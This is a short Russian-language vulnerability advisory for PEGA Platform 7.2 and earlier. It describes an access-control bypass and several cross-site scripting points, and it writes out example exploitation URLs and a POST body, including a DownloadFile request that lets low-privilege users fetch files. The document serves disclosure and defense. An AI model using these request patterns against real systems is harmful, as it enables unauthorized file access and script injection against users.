В продукте компании «Pegasystem» PEGA Platform в версии 7.2 и предыдущих обнаружены множественные уязвимости.

PEGA Platform — это единая унифицированная облачная платформа, которая позволяет быстро развертывать, легко расширять и изменять корпоративные приложения.

1. Обход контроля доступа

Низкоприоритетные пользователи могут напрямую обращаться к ресурсам администратора.

Пример экстплуатации уязвимости:

prweb/RANDOMTOKEN/!STANDARD?pyActivity=@baseclass.DownloadFile&FileName=FILENAME

2. Межсайтовый скриптинг

Уязвимости позволяют исполнять вредонсный JavaScript код на стороне клиента.

Пример эксплуатации уязвимости:

— На главной странице

prweb/RANDOMTOKEN/![XSS]

— JavaBean viewer

prweb/RANDOMTOKEN/!STANDARD?pyActivity=Data-Admin-IS-.JavaBeanViewer&beanReference=[XSS]

— Изменение схемы базы данных системы

prweb/RANDOMTOKEN/!STANDARD?pyActivity=Data-Admin-DB-Table.DBSchema_ListClassesInTable
POST: pzFromFrame=&pzUseThread=&pzTransactionId=&pzPrimaryPageName=pyDbSchemaTablesList&pyDatabaseName=PegaDATA&pyTableName=[XSS]

Использование Web Application Firewall позволяет блокировать подобные атаки.